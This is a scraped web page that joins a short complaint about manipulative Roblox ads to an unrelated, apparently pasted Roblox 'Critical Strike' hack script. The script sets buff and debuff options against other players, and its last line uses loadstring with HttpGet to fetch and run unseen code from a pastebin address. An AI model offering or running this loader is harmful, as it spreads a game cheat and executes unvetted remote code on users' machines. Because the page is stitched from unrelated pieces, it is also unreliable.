Ok maybe this is Just me, but all the ads on roblox right now are pretty much in the same categories. The first one being “i SpEnT aLl mY BiRtHdAy mOnEy oN tHiS aD PlEaSe jOiN My GrOuP/PlAy mY gAmE insert sad emojis here”, first of all I just get annoyed on how these ads guilt trap all these kids into doing what the ad says (Because most of the audience is young kids that have good.
Feb 1st, 2020
Roblox Critical Strike Hack Script
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Critical Strike Roblox Hack
- Create by SHADOWCRAFTER999
- ]]
- _G.NS ={}-- DO NOT TOUCH
- _G.NS.Memery_Enabled =true-- Turns on/off Critical Strike Memery
- _G.NS.Memery_Rate =0.5-- The rate that the Memery runs at (0.3 to 0.6 preferred)
- _G.NS.Memery_Self =true-- Turns on/off buffs to yourself
- _G.NS.Memery_Others =true-- Turns on/off debuffs to others
- _G.NS.Memery_Buffs ={-- Buff effects that will be given to yourself
- 'DEFENSE +5',
- 'DEFENSE +8',
- 'DAMAGE +5',
- 'HASTE',
- _G.NS.Memery_Debuffs ={-- Debuff effects that will be given to others
- 'DEFENSE -5',
- 'DAMAGE -3',
- 'DAMAGE -6',
- 'SNOWY',
- }
- _G.NS.Memery_Allow ={-- People that will also receive buffs
- 'YouCanAddAsManyAsYouWant',
- }
- _G.NS.Memery_Ignore ={-- People that the debuff spammer will ignore
- 'YouCanAddAsManyAsYouWant',
- }
- --//
- --//
- loadstring(game:HttpGet('https://pastebin.com/raw/tDPHwmn6',true))()
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